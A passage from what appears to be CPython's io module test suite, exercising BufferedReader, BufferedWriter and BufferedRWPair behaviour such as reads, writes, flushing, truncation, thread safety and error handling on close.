def test_error_through_destructor(self):
# Test that the exception state is not modified by a destructor,
# even if close() fails.
rawio = self.CloseFailureIO()
def f():
self.tp(rawio).xyzzy
with support.captured_output("stderr") as s:
self.assertRaises(AttributeError, f)
s = s.getvalue().strip()
if s:
# The destructor *may* have printed an unraisable error, check it
self.assertEqual(len(s.splitlines()), 1)
self.assertTrue(s.startswith("Exception OSError: "), s)
self.assertTrue(s.endswith(" ignored"), s)
def test_repr(self):
raw = self.MockRawIO()
b = self.tp(raw)
clsname = "%s.%s" % (self.tp.__module__, self.tp.__qualname__)
self.assertEqual(repr(b), "<%s>" % clsname)
raw.name = "dummy"
self.assertEqual(repr(b), "<%s name='dummy'>" % clsname)
raw.name = b"dummy"
self.assertEqual(repr(b), "<%s name=b'dummy'>" % clsname)
def test_recursive_repr(self):
# Issue #25455
raw = self.MockRawIO()
b = self.tp(raw)
with support.swap_attr(raw, 'name', b):
try:
repr(b) # Should not crash
except RuntimeError:
pass
def test_flush_error_on_close(self):
# Test that buffered file is closed despite failed flush
# and that flush() is called before file closed.
raw = self.MockRawIO()
closed = []
def bad_flush():
closed[:] = [b.closed, raw.closed]
raise OSError()
raw.flush = bad_flush
b = self.tp(raw)
self.assertRaises(OSError, b.close) # exception not swallowed
self.assertTrue(b.closed)
self.assertTrue(raw.closed)
self.assertTrue(closed) # flush() called
self.assertFalse(closed[0]) # flush() called before file closed
self.assertFalse(closed[1])
raw.flush = lambda: None # break reference loop
def test_close_error_on_close(self):
raw = self.MockRawIO()
def bad_flush():
raise OSError('flush')
def bad_close():
raise OSError('close')
raw.close = bad_close
b = self.tp(raw)
b.flush = bad_flush
with self.assertRaises(OSError) as err: # exception not swallowed
b.close()
self.assertEqual(err.exception.args, ('close',))
self.assertIsInstance(err.exception.__context__, OSError)
self.assertEqual(err.exception.__context__.args, ('flush',))
self.assertFalse(b.closed)
def test_nonnormalized_close_error_on_close(self):
# Issue #21677
raw = self.MockRawIO()
def bad_flush():
raise non_existing_flush
def bad_close():
raise non_existing_close
raw.close = bad_close
b = self.tp(raw)
b.flush = bad_flush
with self.assertRaises(NameError) as err: # exception not swallowed
b.close()
self.assertIn('non_existing_close', str(err.exception))
self.assertIsInstance(err.exception.__context__, NameError)
self.assertIn('non_existing_flush', str(err.exception.__context__))
self.assertFalse(b.closed)
def test_multi_close(self):
raw = self.MockRawIO()
b = self.tp(raw)
b.close()
b.close()
b.close()
self.assertRaises(ValueError, b.flush)
def test_unseekable(self):
    """tell() and seek() on a buffer over an unseekable raw stream must
    raise UnsupportedOperation."""
    unseekable = self.MockUnseekableIO(b"A" * 10)
    bufio = self.tp(unseekable)
    self.assertRaises(self.UnsupportedOperation, bufio.tell)
    self.assertRaises(self.UnsupportedOperation, bufio.seek, 0)
def test_readonly_attributes(self):
    """The ``raw`` attribute of a buffered object is read-only and
    cannot be rebound after construction."""
    buffered = self.tp(self.MockRawIO())
    replacement = self.MockRawIO()
    with self.assertRaises(AttributeError):
        buffered.raw = replacement
class SizeofTest:
    """Mixin verifying that sys.getsizeof() accounts for the internal
    buffer of C-implemented buffered objects."""

    @support.cpython_only
    def test_sizeof(self):
        """getsizeof() must grow exactly in step with ``buffer_size``."""
        bufsize1 = 4096
        bufsize2 = 8192
        rawio = self.MockRawIO()
        bufio = self.tp(rawio, buffer_size=bufsize1)
        # Base object size, excluding the buffer itself.
        size = sys.getsizeof(bufio) - bufsize1
        rawio = self.MockRawIO()
        bufio = self.tp(rawio, buffer_size=bufsize2)
        self.assertEqual(sys.getsizeof(bufio), size + bufsize2)

    @support.cpython_only
    def test_buffer_freeing(self):
        """The internal buffer memory must be released on close()."""
        # NOTE: fixed PEP 8 violation (space before colon in the original
        # ``def test_buffer_freeing(self) :``).
        bufsize = 4096
        rawio = self.MockRawIO()
        bufio = self.tp(rawio, buffer_size=bufsize)
        size = sys.getsizeof(bufio) - bufsize
        bufio.close()
        # After close() the reported size drops back to the base size.
        self.assertEqual(sys.getsizeof(bufio), size)
class BufferedReaderTest(unittest.TestCase, CommonBufferedTests):
    """Behavioral tests for BufferedReader.

    Run against both the C (``io``) and pure-Python (``_pyio``)
    implementations through the ``tp`` class attribute set by subclasses.
    Many assertions count raw-stream reads (``rawio._reads``), so the
    exact statement order matters.
    """

    read_mode = "rb"

    def test_constructor(self):
        rawio = self.MockRawIO([b"abc"])
        bufio = self.tp(rawio)
        # Re-running __init__ must be allowed and must reset state.
        bufio.__init__(rawio)
        bufio.__init__(rawio, buffer_size=1024)
        bufio.__init__(rawio, buffer_size=16)
        self.assertEqual(b"abc", bufio.read())
        # Buffer size must be strictly positive.
        self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=0)
        self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-16)
        self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-1)
        rawio = self.MockRawIO([b"abc"])
        bufio.__init__(rawio)
        self.assertEqual(b"abc", bufio.read())

    def test_uninitialized(self):
        # Using an object created by __new__ without __init__ must fail
        # cleanly, and a later __init__ must make it usable.
        bufio = self.tp.__new__(self.tp)
        del bufio
        bufio = self.tp.__new__(self.tp)
        self.assertRaisesRegex((ValueError, AttributeError),
                               'uninitialized|has no attribute',
                               bufio.read, 0)
        bufio.__init__(self.MockRawIO())
        self.assertEqual(bufio.read(0), b'')

    def test_read(self):
        for arg in (None, 7):
            rawio = self.MockRawIO((b"abc", b"d", b"efg"))
            bufio = self.tp(rawio)
            self.assertEqual(b"abcdefg", bufio.read(arg))
        # Invalid args
        self.assertRaises(ValueError, bufio.read, -2)

    def test_read1(self):
        # read1() must do at most one raw read; _reads counts them.
        rawio = self.MockRawIO((b"abc", b"d", b"efg"))
        bufio = self.tp(rawio)
        self.assertEqual(b"a", bufio.read(1))
        self.assertEqual(b"b", bufio.read1(1))
        self.assertEqual(rawio._reads, 1)
        self.assertEqual(b"", bufio.read1(0))
        self.assertEqual(b"c", bufio.read1(100))
        self.assertEqual(rawio._reads, 1)
        self.assertEqual(b"d", bufio.read1(100))
        self.assertEqual(rawio._reads, 2)
        self.assertEqual(b"efg", bufio.read1(100))
        self.assertEqual(rawio._reads, 3)
        self.assertEqual(b"", bufio.read1(100))
        self.assertEqual(rawio._reads, 4)

    def test_read1_arbitrary(self):
        # read1() with no argument / -1 returns whatever is available.
        rawio = self.MockRawIO((b"abc", b"d", b"efg"))
        bufio = self.tp(rawio)
        self.assertEqual(b"a", bufio.read(1))
        self.assertEqual(b"bc", bufio.read1())
        self.assertEqual(b"d", bufio.read1())
        self.assertEqual(b"efg", bufio.read1(-1))
        self.assertEqual(rawio._reads, 3)
        self.assertEqual(b"", bufio.read1())
        self.assertEqual(rawio._reads, 4)

    def test_readinto(self):
        rawio = self.MockRawIO((b"abc", b"d", b"efg"))
        bufio = self.tp(rawio)
        b = bytearray(2)
        self.assertEqual(bufio.readinto(b), 2)
        self.assertEqual(b, b"ab")
        self.assertEqual(bufio.readinto(b), 2)
        self.assertEqual(b, b"cd")
        self.assertEqual(bufio.readinto(b), 2)
        self.assertEqual(b, b"ef")
        # Partial fill at EOF: only the first byte is overwritten.
        self.assertEqual(bufio.readinto(b), 1)
        self.assertEqual(b, b"gf")
        self.assertEqual(bufio.readinto(b), 0)
        self.assertEqual(b, b"gf")
        # None from the raw stream simulates EWOULDBLOCK.
        rawio = self.MockRawIO((b"abc", None))
        bufio = self.tp(rawio)
        self.assertEqual(bufio.readinto(b), 2)
        self.assertEqual(b, b"ab")
        self.assertEqual(bufio.readinto(b), 1)
        self.assertEqual(b, b"cb")

    def test_readinto1(self):
        # readinto1() drains the internal buffer first, then does at most
        # one additional raw read.
        buffer_size = 10
        rawio = self.MockRawIO((b"abc", b"de", b"fgh", b"jkl"))
        bufio = self.tp(rawio, buffer_size=buffer_size)
        b = bytearray(2)
        self.assertEqual(bufio.peek(3), b'abc')
        self.assertEqual(rawio._reads, 1)
        self.assertEqual(bufio.readinto1(b), 2)
        self.assertEqual(b, b"ab")
        self.assertEqual(rawio._reads, 1)
        self.assertEqual(bufio.readinto1(b), 1)
        self.assertEqual(b[:1], b"c")
        self.assertEqual(rawio._reads, 1)
        self.assertEqual(bufio.readinto1(b), 2)
        self.assertEqual(b, b"de")
        self.assertEqual(rawio._reads, 2)
        b = bytearray(2*buffer_size)
        self.assertEqual(bufio.peek(3), b'fgh')
        self.assertEqual(rawio._reads, 3)
        self.assertEqual(bufio.readinto1(b), 6)
        self.assertEqual(b[:6], b"fghjkl")
        self.assertEqual(rawio._reads, 4)

    def test_readinto_array(self):
        buffer_size = 60
        data = b"a" * 26
        rawio = self.MockRawIO((data,))
        bufio = self.tp(rawio, buffer_size=buffer_size)
        # Create an array with element size > 1 byte
        b = array.array('i', b'x' * 32)
        assert len(b) != 16
        # Read into it. We should get as many *bytes* as we can fit into b
        # (which is more than the number of elements)
        n = bufio.readinto(b)
        self.assertGreater(n, len(b))
        # Check that old contents of b are preserved
        bm = memoryview(b).cast('B')
        self.assertLess(n, len(bm))
        self.assertEqual(bm[:n], data[:n])
        self.assertEqual(bm[n:], b'x' * (len(bm[n:])))

    def test_readinto1_array(self):
        buffer_size = 60
        data = b"a" * 26
        rawio = self.MockRawIO((data,))
        bufio = self.tp(rawio, buffer_size=buffer_size)
        # Create an array with element size > 1 byte
        b = array.array('i', b'x' * 32)
        assert len(b) != 16
        # Read into it. We should get as many *bytes* as we can fit into b
        # (which is more than the number of elements)
        n = bufio.readinto1(b)
        self.assertGreater(n, len(b))
        # Check that old contents of b are preserved
        bm = memoryview(b).cast('B')
        self.assertLess(n, len(bm))
        self.assertEqual(bm[:n], data[:n])
        self.assertEqual(bm[n:], b'x' * (len(bm[n:])))

    def test_readlines(self):
        def bufio():
            rawio = self.MockRawIO((b"abc\n", b"d\n", b"ef"))
            return self.tp(rawio)
        self.assertEqual(bufio().readlines(), [b"abc\n", b"d\n", b"ef"])
        # The hint stops reading once at least 5 bytes of lines were read.
        self.assertEqual(bufio().readlines(5), [b"abc\n", b"d\n"])
        self.assertEqual(bufio().readlines(None), [b"abc\n", b"d\n", b"ef"])

    def test_buffering(self):
        data = b"abcdefghi"
        dlen = len(data)
        # [buffer size, buffered read sizes, expected raw read sizes]
        tests = [
            [ 100, [ 3, 1, 4, 8 ], [ dlen, 0 ] ],
            [ 100, [ 3, 3, 3], [ dlen ] ],
            [ 4, [ 1, 2, 4, 2 ], [ 4, 4, 1 ] ],
        ]
        for bufsize, buf_read_sizes, raw_read_sizes in tests:
            rawio = self.MockFileIO(data)
            bufio = self.tp(rawio, buffer_size=bufsize)
            pos = 0
            for nbytes in buf_read_sizes:
                self.assertEqual(bufio.read(nbytes), data[pos:pos+nbytes])
                pos += nbytes
            # this is mildly implementation-dependent
            self.assertEqual(rawio.read_history, raw_read_sizes)

    def test_read_non_blocking(self):
        # Inject some None's in there to simulate EWOULDBLOCK
        rawio = self.MockRawIO((b"abc", b"d", None, b"efg", None, None, None))
        bufio = self.tp(rawio)
        self.assertEqual(b"abcd", bufio.read(6))
        self.assertEqual(b"e", bufio.read(1))
        self.assertEqual(b"fg", bufio.read())
        self.assertEqual(b"", bufio.peek(1))
        # No data available at all -> None, then definite EOF -> b"".
        self.assertIsNone(bufio.read())
        self.assertEqual(b"", bufio.read())
        rawio = self.MockRawIO((b"a", None, None))
        self.assertEqual(b"a", rawio.readall())
        self.assertIsNone(rawio.readall())

    def test_read_past_eof(self):
        rawio = self.MockRawIO((b"abc", b"d", b"efg"))
        bufio = self.tp(rawio)
        self.assertEqual(b"abcdefg", bufio.read(9000))

    def test_read_all(self):
        rawio = self.MockRawIO((b"abc", b"d", b"efg"))
        bufio = self.tp(rawio)
        self.assertEqual(b"abcdefg", bufio.read())

    @support.requires_resource('cpu')
    def test_threads(self):
        try:
            # Write out many bytes with exactly the same number of 0's,
            # 1's... 255's. This will help us check that concurrent reading
            # doesn't duplicate or forget contents.
            N = 1000
            l = list(range(256)) * N
            random.shuffle(l)
            s = bytes(bytearray(l))
            with self.open(support.TESTFN, "wb") as f:
                f.write(s)
            with self.open(support.TESTFN, self.read_mode, buffering=0) as raw:
                bufio = self.tp(raw, 8)
                errors = []
                results = []
                def f():
                    try:
                        # Intra-buffer read then buffer-flushing read
                        for n in cycle([1, 19]):
                            s = bufio.read(n)
                            if not s:
                                break
                            # list.append() is atomic
                            results.append(s)
                    except Exception as e:
                        errors.append(e)
                        raise
                threads = [threading.Thread(target=f) for x in range(20)]
                with support.start_threads(threads):
                    time.sleep(0.02) # yield
                self.assertFalse(errors,
                                 "the following exceptions were caught: %r" % errors)
                # Every byte value must still occur exactly N times.
                s = b''.join(results)
                for i in range(256):
                    c = bytes(bytearray([i]))
                    self.assertEqual(s.count(c), N)
        finally:
            support.unlink(support.TESTFN)

    def test_unseekable(self):
        bufio = self.tp(self.MockUnseekableIO(b"A" * 10))
        self.assertRaises(self.UnsupportedOperation, bufio.tell)
        self.assertRaises(self.UnsupportedOperation, bufio.seek, 0)
        # Still unseekable after a read has filled the buffer.
        bufio.read(1)
        self.assertRaises(self.UnsupportedOperation, bufio.seek, 0)
        self.assertRaises(self.UnsupportedOperation, bufio.tell)

    def test_misbehaved_io(self):
        rawio = self.MisbehavedRawIO((b"abc", b"d", b"efg"))
        bufio = self.tp(rawio)
        self.assertRaises(OSError, bufio.seek, 0)
        self.assertRaises(OSError, bufio.tell)

    def test_no_extraneous_read(self):
        # Issue #9550; when the raw IO object has satisfied the read request,
        # we should not issue any additional reads, otherwise it may block
        # (e.g. socket).
        bufsize = 16
        for n in (2, bufsize - 1, bufsize, bufsize + 1, bufsize * 2):
            rawio = self.MockRawIO([b"x" * n])
            bufio = self.tp(rawio, bufsize)
            self.assertEqual(bufio.read(n), b"x" * n)
            # Simple case: one raw read is enough to satisfy the request.
            self.assertEqual(rawio._extraneous_reads, 0,
                             "failed for {}: {} != 0".format(n, rawio._extraneous_reads))
            # A more complex case where two raw reads are needed to satisfy
            # the request.
            rawio = self.MockRawIO([b"x" * (n - 1), b"x"])
            bufio = self.tp(rawio, bufsize)
            self.assertEqual(bufio.read(n), b"x" * n)
            self.assertEqual(rawio._extraneous_reads, 0,
                             "failed for {}: {} != 0".format(n, rawio._extraneous_reads))

    def test_read_on_closed(self):
        # Issue #23796
        b = io.BufferedReader(io.BytesIO(b"12"))
        b.read(1)
        b.close()
        # peek()/read1() on a closed reader must raise, not return stale data.
        self.assertRaises(ValueError, b.peek)
        self.assertRaises(ValueError, b.read1, 1)
class CBufferedReaderTest(BufferedReaderTest, SizeofTest):
    """Runs BufferedReaderTest against the C implementation (``io``),
    plus C-specific checks (huge allocations, GC, arg errors)."""

    tp = io.BufferedReader

    @unittest.skipIf(MEMORY_SANITIZER, "MSan defaults to crashing "
                     "instead of returning NULL for malloc failure.")
    def test_constructor(self):
        BufferedReaderTest.test_constructor(self)
        # The allocation can succeed on 32-bit builds, e.g. with more
        # than 2 GiB RAM and a 64-bit kernel.
        if sys.maxsize > 0x7FFFFFFF:
            rawio = self.MockRawIO()
            bufio = self.tp(rawio)
            self.assertRaises((OverflowError, MemoryError, ValueError),
                              bufio.__init__, rawio, sys.maxsize)

    def test_initialization(self):
        # A failed __init__ must leave the object unusable (every read
        # afterwards raises) rather than half-initialized.
        rawio = self.MockRawIO([b"abc"])
        bufio = self.tp(rawio)
        self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=0)
        self.assertRaises(ValueError, bufio.read)
        self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-16)
        self.assertRaises(ValueError, bufio.read)
        self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-1)
        self.assertRaises(ValueError, bufio.read)

    def test_misbehaved_io_read(self):
        rawio = self.MisbehavedRawIO((b"abc", b"d", b"efg"))
        bufio = self.tp(rawio)
        # _pyio.BufferedReader seems to implement reading different, so that
        # checking this is not so easy.
        self.assertRaises(OSError, bufio.read, 10)

    def test_garbage_collection(self):
        # C BufferedReader objects are collected.
        # The Python version has __del__, so it ends into gc.garbage instead
        self.addCleanup(support.unlink, support.TESTFN)
        with support.check_warnings(('', ResourceWarning)):
            rawio = self.FileIO(support.TESTFN, "w+b")
            f = self.tp(rawio)
            f.f = f  # create a reference cycle on purpose
            wr = weakref.ref(f)
        del f
        support.gc_collect()
        self.assertIsNone(wr(), wr)

    def test_args_error(self):
        # Issue #17275
        with self.assertRaisesRegex(TypeError, "BufferedReader"):
            self.tp(io.BytesIO(), 1024, 1024, 1024)
class PyBufferedReaderTest(BufferedReaderTest):
    """Runs BufferedReaderTest against the pure-Python implementation."""
    tp = pyio.BufferedReader
class BufferedWriterTest(unittest.TestCase, CommonBufferedTests):
    """Behavioral tests for BufferedWriter.

    Run against both the C and pure-Python implementations through the
    ``tp`` class attribute set by subclasses.  Many tests inspect the
    mock raw stream's ``_write_stack`` to verify exactly when data was
    flushed, so statement order is significant.
    """

    write_mode = "wb"

    def test_constructor(self):
        rawio = self.MockRawIO()
        bufio = self.tp(rawio)
        # Re-running __init__ must be allowed and must reset state.
        bufio.__init__(rawio)
        bufio.__init__(rawio, buffer_size=1024)
        bufio.__init__(rawio, buffer_size=16)
        self.assertEqual(3, bufio.write(b"abc"))
        bufio.flush()
        # Buffer size must be strictly positive.
        self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=0)
        self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-16)
        self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-1)
        bufio.__init__(rawio)
        self.assertEqual(3, bufio.write(b"ghi"))
        bufio.flush()
        self.assertEqual(b"".join(rawio._write_stack), b"abcghi")

    def test_uninitialized(self):
        bufio = self.tp.__new__(self.tp)
        del bufio
        bufio = self.tp.__new__(self.tp)
        self.assertRaisesRegex((ValueError, AttributeError),
                               'uninitialized|has no attribute',
                               bufio.write, b'')
        bufio.__init__(self.MockRawIO())
        self.assertEqual(bufio.write(b''), 0)

    def test_detach_flush(self):
        # detach() must flush pending buffered data to the raw stream.
        raw = self.MockRawIO()
        buf = self.tp(raw)
        buf.write(b"howdy!")
        self.assertFalse(raw._write_stack)
        buf.detach()
        self.assertEqual(raw._write_stack, [b"howdy!"])

    def test_write(self):
        # Write to the buffered IO but don't overflow the buffer.
        writer = self.MockRawIO()
        bufio = self.tp(writer, 8)
        bufio.write(b"abc")
        self.assertFalse(writer._write_stack)
        buffer = bytearray(b"def")
        bufio.write(buffer)
        buffer[:] = b"***" # Overwrite our copy of the data
        bufio.flush()
        # The buffered writer must have copied the data, not kept a view.
        self.assertEqual(b"".join(writer._write_stack), b"abcdef")

    def test_write_overflow(self):
        writer = self.MockRawIO()
        bufio = self.tp(writer, 8)
        contents = b"abcdefghijklmnop"
        for n in range(0, len(contents), 3):
            bufio.write(contents[n:n+3])
        flushed = b"".join(writer._write_stack)
        # At least (total - 8) bytes were implicitly flushed, perhaps more
        # depending on the implementation.
        self.assertTrue(flushed.startswith(contents[:-8]), flushed)

    def check_writes(self, intermediate_func):
        # Lots of writes, test the flushed output is as expected.
        contents = bytes(range(256)) * 1000
        n = 0
        writer = self.MockRawIO()
        bufio = self.tp(writer, 13)
        # Generator of write sizes: repeat each N 15 times then proceed to N+1
        def gen_sizes():
            for size in count(1):
                for i in range(15):
                    yield size
        sizes = gen_sizes()
        while n < len(contents):
            size = min(next(sizes), len(contents) - n)
            self.assertEqual(bufio.write(contents[n:n+size]), size)
            # Hook point: subclasses interleave flushes/seeks/reads here.
            intermediate_func(bufio)
            n += size
        bufio.flush()
        self.assertEqual(contents, b"".join(writer._write_stack))

    def test_writes(self):
        self.check_writes(lambda bufio: None)

    def test_writes_and_flushes(self):
        self.check_writes(lambda bufio: bufio.flush())

    def test_writes_and_seeks(self):
        def _seekabs(bufio):
            pos = bufio.tell()
            bufio.seek(pos + 1, 0)
            bufio.seek(pos - 1, 0)
            bufio.seek(pos, 0)
        self.check_writes(_seekabs)
        def _seekrel(bufio):
            pos = bufio.seek(0, 1)
            bufio.seek(+1, 1)
            bufio.seek(-1, 1)
            bufio.seek(pos, 0)
        self.check_writes(_seekrel)

    def test_writes_and_truncates(self):
        self.check_writes(lambda bufio: bufio.truncate(bufio.tell()))

    def test_write_non_blocking(self):
        raw = self.MockNonBlockWriterIO()
        bufio = self.tp(raw, 8)
        self.assertEqual(bufio.write(b"abcd"), 4)
        self.assertEqual(bufio.write(b"efghi"), 5)
        # 1 byte will be written, the rest will be buffered
        raw.block_on(b"k")
        self.assertEqual(bufio.write(b"jklmn"), 5)
        # 8 bytes will be written, 8 will be buffered and the rest will be lost
        raw.block_on(b"0")
        try:
            bufio.write(b"opqrwxyz0123456789")
        except self.BlockingIOError as e:
            written = e.characters_written
        else:
            self.fail("BlockingIOError should have been raised")
        self.assertEqual(written, 16)
        self.assertEqual(raw.pop_written(),
                         b"abcdefghijklmnopqrwxyz")
        self.assertEqual(bufio.write(b"ABCDEFGHI"), 9)
        s = raw.pop_written()
        # Previously buffered bytes were flushed
        self.assertTrue(s.startswith(b"01234567A"), s)

    def test_write_and_rewind(self):
        raw = io.BytesIO()
        bufio = self.tp(raw, 4)
        self.assertEqual(bufio.write(b"abcdef"), 6)
        self.assertEqual(bufio.tell(), 6)
        bufio.seek(0, 0)
        self.assertEqual(bufio.write(b"XY"), 2)
        bufio.seek(6, 0)
        self.assertEqual(raw.getvalue(), b"XYcdef")
        self.assertEqual(bufio.write(b"123456"), 6)
        bufio.flush()
        self.assertEqual(raw.getvalue(), b"XYcdef123456")

    def test_flush(self):
        writer = self.MockRawIO()
        bufio = self.tp(writer, 8)
        bufio.write(b"abc")
        bufio.flush()
        self.assertEqual(b"abc", writer._write_stack[0])

    def test_writelines(self):
        l = [b'ab', b'cd', b'ef']
        writer = self.MockRawIO()
        bufio = self.tp(writer, 8)
        bufio.writelines(l)
        bufio.flush()
        self.assertEqual(b''.join(writer._write_stack), b'abcdef')

    def test_writelines_userlist(self):
        # writelines() accepts arbitrary iterables, not just lists.
        l = UserList([b'ab', b'cd', b'ef'])
        writer = self.MockRawIO()
        bufio = self.tp(writer, 8)
        bufio.writelines(l)
        bufio.flush()
        self.assertEqual(b''.join(writer._write_stack), b'abcdef')

    def test_writelines_error(self):
        writer = self.MockRawIO()
        bufio = self.tp(writer, 8)
        self.assertRaises(TypeError, bufio.writelines, [1, 2, 3])
        self.assertRaises(TypeError, bufio.writelines, None)
        self.assertRaises(TypeError, bufio.writelines, 'abc')

    def test_destructor(self):
        # Destroying the buffered writer must flush pending data.
        writer = self.MockRawIO()
        bufio = self.tp(writer, 8)
        bufio.write(b"abc")
        del bufio
        support.gc_collect()
        self.assertEqual(b"abc", writer._write_stack[0])

    def test_truncate(self):
        # Truncate implicitly flushes the buffer.
        self.addCleanup(support.unlink, support.TESTFN)
        with self.open(support.TESTFN, self.write_mode, buffering=0) as raw:
            bufio = self.tp(raw, 8)
            bufio.write(b"abcdef")
            self.assertEqual(bufio.truncate(3), 3)
            # truncate() must not move the logical file position.
            self.assertEqual(bufio.tell(), 6)
        with self.open(support.TESTFN, "rb", buffering=0) as f:
            self.assertEqual(f.read(), b"abc")

    def test_truncate_after_write(self):
        # Ensure that truncate preserves the file position after
        # writes longer than the buffer size.
        # Issue: https://bugs.python.org/issue32228
        self.addCleanup(support.unlink, support.TESTFN)
        with self.open(support.TESTFN, "wb") as f:
            # Fill with some buffer
            f.write(b'\x00' * 10000)
        buffer_sizes = [8192, 4096, 200]
        for buffer_size in buffer_sizes:
            with self.open(support.TESTFN, "r+b", buffering=buffer_size) as f:
                f.write(b'\x00' * (buffer_size + 1))
                # After write write_pos and write_end are set to 0
                f.read(1)
                # read operation makes sure that pos != raw_pos
                f.truncate()
                self.assertEqual(f.tell(), buffer_size + 2)

    @support.requires_resource('cpu')
    def test_threads(self):
        try:
            # Write out many bytes from many threads and test they were
            # all flushed.
            N = 1000
            contents = bytes(range(256)) * N
            sizes = cycle([1, 19])
            n = 0
            queue = deque()
            while n < len(contents):
                size = next(sizes)
                queue.append(contents[n:n+size])
                n += size
            del contents
            # We use a real file object because it allows us to
            # exercise situations where the GIL is released before
            # writing the buffer to the raw streams. This is in addition
            # to concurrency issues due to switching threads in the middle
            # of Python code.
            with self.open(support.TESTFN, self.write_mode, buffering=0) as raw:
                bufio = self.tp(raw, 8)
                errors = []
                def f():
                    try:
                        while True:
                            try:
                                s = queue.popleft()
                            except IndexError:
                                return
                            bufio.write(s)
                    except Exception as e:
                        errors.append(e)
                        raise
                threads = [threading.Thread(target=f) for x in range(20)]
                with support.start_threads(threads):
                    time.sleep(0.02) # yield
                self.assertFalse(errors,
                                 "the following exceptions were caught: %r" % errors)
                bufio.close()
            with self.open(support.TESTFN, "rb") as f:
                s = f.read()
            # Every byte value must have been flushed exactly N times.
            for i in range(256):
                self.assertEqual(s.count(bytes([i])), N)
        finally:
            support.unlink(support.TESTFN)

    def test_misbehaved_io(self):
        rawio = self.MisbehavedRawIO()
        bufio = self.tp(rawio, 5)
        self.assertRaises(OSError, bufio.seek, 0)
        self.assertRaises(OSError, bufio.tell)
        self.assertRaises(OSError, bufio.write, b"abcdef")

    def test_max_buffer_size_removal(self):
        # The old third positional argument (max_buffer_size) was removed.
        with self.assertRaises(TypeError):
            self.tp(self.MockRawIO(), 8, 12)

    def test_write_error_on_close(self):
        raw = self.MockRawIO()
        def bad_write(b):
            raise OSError()
        raw.write = bad_write
        b = self.tp(raw)
        b.write(b'spam')
        self.assertRaises(OSError, b.close) # exception not swallowed
        self.assertTrue(b.closed)

    def test_slow_close_from_thread(self):
        # Issue #31976
        # While one thread is blocked inside close()'s flush, writes from
        # another thread must fail and the object must end up closed.
        rawio = self.SlowFlushRawIO()
        bufio = self.tp(rawio, 8)
        t = threading.Thread(target=bufio.close)
        t.start()
        rawio.in_flush.wait()
        self.assertRaises(ValueError, bufio.write, b'spam')
        self.assertTrue(bufio.closed)
        t.join()
class CBufferedWriterTest(BufferedWriterTest, SizeofTest):
    """Runs BufferedWriterTest against the C implementation (``io``),
    plus C-specific checks (huge allocations, GC flushing, arg errors)."""

    tp = io.BufferedWriter

    @unittest.skipIf(MEMORY_SANITIZER, "MSan defaults to crashing "
                     "instead of returning NULL for malloc failure.")
    def test_constructor(self):
        BufferedWriterTest.test_constructor(self)
        # The allocation can succeed on 32-bit builds, e.g. with more
        # than 2 GiB RAM and a 64-bit kernel.
        if sys.maxsize > 0x7FFFFFFF:
            rawio = self.MockRawIO()
            bufio = self.tp(rawio)
            self.assertRaises((OverflowError, MemoryError, ValueError),
                              bufio.__init__, rawio, sys.maxsize)

    def test_initialization(self):
        # A failed __init__ must leave the object unusable.
        rawio = self.MockRawIO()
        bufio = self.tp(rawio)
        self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=0)
        self.assertRaises(ValueError, bufio.write, b"def")
        self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-16)
        self.assertRaises(ValueError, bufio.write, b"def")
        self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-1)
        self.assertRaises(ValueError, bufio.write, b"def")

    def test_garbage_collection(self):
        # C BufferedWriter objects are collected, and collecting them flushes
        # all data to disk.
        # The Python version has __del__, so it ends into gc.garbage instead
        self.addCleanup(support.unlink, support.TESTFN)
        with support.check_warnings(('', ResourceWarning)):
            rawio = self.FileIO(support.TESTFN, "w+b")
            f = self.tp(rawio)
            f.write(b"123xxx")
            f.x = f  # create a reference cycle on purpose
            wr = weakref.ref(f)
        del f
        support.gc_collect()
        self.assertIsNone(wr(), wr)
        with self.open(support.TESTFN, "rb") as f:
            self.assertEqual(f.read(), b"123xxx")

    def test_args_error(self):
        # Issue #17275
        with self.assertRaisesRegex(TypeError, "BufferedWriter"):
            self.tp(io.BytesIO(), 1024, 1024, 1024)
class PyBufferedWriterTest(BufferedWriterTest):
    """Runs BufferedWriterTest against the pure-Python implementation."""
    tp = pyio.BufferedWriter
class BufferedRWPairTest(unittest.TestCase):
    """Tests for BufferedRWPair, which couples an independent reader and
    writer into one object.  ``tp`` is set by subclasses to the C or
    pure-Python class."""

    def test_constructor(self):
        pair = self.tp(self.MockRawIO(), self.MockRawIO())
        self.assertFalse(pair.closed)

    def test_uninitialized(self):
        # Objects created via __new__ but never __init__'ed must fail
        # cleanly, and become usable after a later __init__.
        pair = self.tp.__new__(self.tp)
        del pair
        pair = self.tp.__new__(self.tp)
        self.assertRaisesRegex((ValueError, AttributeError),
                               'uninitialized|has no attribute',
                               pair.read, 0)
        self.assertRaisesRegex((ValueError, AttributeError),
                               'uninitialized|has no attribute',
                               pair.write, b'')
        pair.__init__(self.MockRawIO(), self.MockRawIO())
        self.assertEqual(pair.read(0), b'')
        self.assertEqual(pair.write(b''), 0)

    def test_detach(self):
        # detach() makes no sense for a pair: there is no single raw stream.
        pair = self.tp(self.MockRawIO(), self.MockRawIO())
        self.assertRaises(self.UnsupportedOperation, pair.detach)

    def test_constructor_max_buffer_size_removal(self):
        # The old fourth positional argument (max_buffer_size) was removed.
        with self.assertRaises(TypeError):
            self.tp(self.MockRawIO(), self.MockRawIO(), 8, 12)

    def test_constructor_with_not_readable(self):
        class NotReadable(MockRawIO):
            def readable(self):
                return False
        self.assertRaises(OSError, self.tp, NotReadable(), self.MockRawIO())

    def test_constructor_with_not_writeable(self):
        class NotWriteable(MockRawIO):
            def writable(self):
                return False
        self.assertRaises(OSError, self.tp, self.MockRawIO(), NotWriteable())

    def test_read(self):
        pair = self.tp(self.BytesIO(b"abcdef"), self.MockRawIO())
        self.assertEqual(pair.read(3), b"abc")
        self.assertEqual(pair.read(1), b"d")
        self.assertEqual(pair.read(), b"ef")
        pair = self.tp(self.BytesIO(b"abc"), self.MockRawIO())
        self.assertEqual(pair.read(None), b"abc")

    def test_readlines(self):
